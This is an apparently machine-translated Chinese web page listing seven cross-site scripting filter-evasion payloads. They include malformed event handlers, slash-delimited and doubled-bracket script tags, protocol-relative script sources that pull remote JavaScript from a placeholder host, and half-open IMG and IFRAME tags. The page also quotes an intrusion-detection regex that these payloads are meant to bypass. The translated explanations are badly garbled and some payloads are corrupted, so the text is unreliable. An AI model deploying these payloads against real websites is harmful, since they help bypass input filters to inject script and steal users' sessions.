xss攻击代码中

1.第二部分XSS Non-alpha-non-digit。 yawnmoth领我注意这个向量,基于相同的理念为以上,不过,我扩展它,用我的fuzzer。壁虎的渲染器允许任何字符比其他的字母、数字或封装识字课(如引号,尖括号,等…)之间的事件处理器和等号,使它更容易旁路跨站脚本块

代码:<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

2.三部分XSS Non-alpha-non-digit。 认为经营模式有时描述内容脱毛带这我注意到有稍微不同的行为之间的渲染引擎IE和壁虎,允许只是一条斜线标签与参数之间没有空格。这可能是有益的,如果系统不允许空间

代码:<SCRIPT/SRC=\'#\'" href="http://www.xxx.com/xss.js"></SCRIPT">www.xxx.com/xss.js"></SCRIPT>

3.附加开括号内,这XSS向量可以打败某些检测引擎,工作的第一次使用摩擦副尖括号开启和关闭,然后做一个比较的标签里面,而不是一个更有效率的algorythm喜欢找Boyer-Moore整个字符串场开角型支架及相关的标签(岗位de-obfuscation,当然)。从双斜线注释结尾不相干的支架和一个JavaScript错误
代码:<<SCRIPT>alert("XSS");//<</SCRIPT>

4.在脚本协议解决标签。这个特别的变体Łukasz Pilorz提交、建立部分从Ozh决议的协议绕过如下。这个跨站脚本实例工程在IE中,网景在IE中渲染模式,如果你加入一个歌剧< /脚本>标签在最后。然而,这是特别有用的在空间是一个问题,当然,你的域名越短越好。“.j”是有效的,不管编码类型,因为浏览器知道它在上下文的剧本标签。
代码:<SCRIPT SRC=//www.xxx.com/.j>

5.半开的HTML / JavaScript XSS向量。 不像火狐IE渲染器不会增加额外的数据,你的页面,但是它确实允许javascript指令在图像。作为一个向量,这是有用的,因为它不需要一个近角支架。这是假设有任何HTML标签下面你在哪里将这种跨站脚本向量。即使没有合”>“标签标记在它下面将关闭它。注:这并陷入困境的HTML,依赖于对HTML是之上。网络入侵检测系统就会围绕以下功能:/(\ % 3 D)| =)[^ \ n]*(\ % 3 C)| <)[^ \ n]+((\ % 3 E)| >)/因为它不需要结束”>“。附注一点,这也是情感与真实世界XSS过滤我碰到使用一个开放性< IFRAME的标签,而不是一个<图片标签

代码:<IMG SRC=\'#\'" /p>

6.敞开式的双开的尖括号。这是一个古怪的人,史蒂文Christey引起我注意的。起初我misclassified这相同的XSS向量如上但令人惊讶的是不同的。使用一个开角型支架最后的矢量来代替一个接近支架会形成不同的行为角度网景壁虎渲染。

代码:<iframe src=www.xxx.com/scriptlet.html <

7.XSS单引号或没有双引号或结尾

代码:<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

你可能感兴趣的:(渲染,处理器,hellip,经营模式,识字)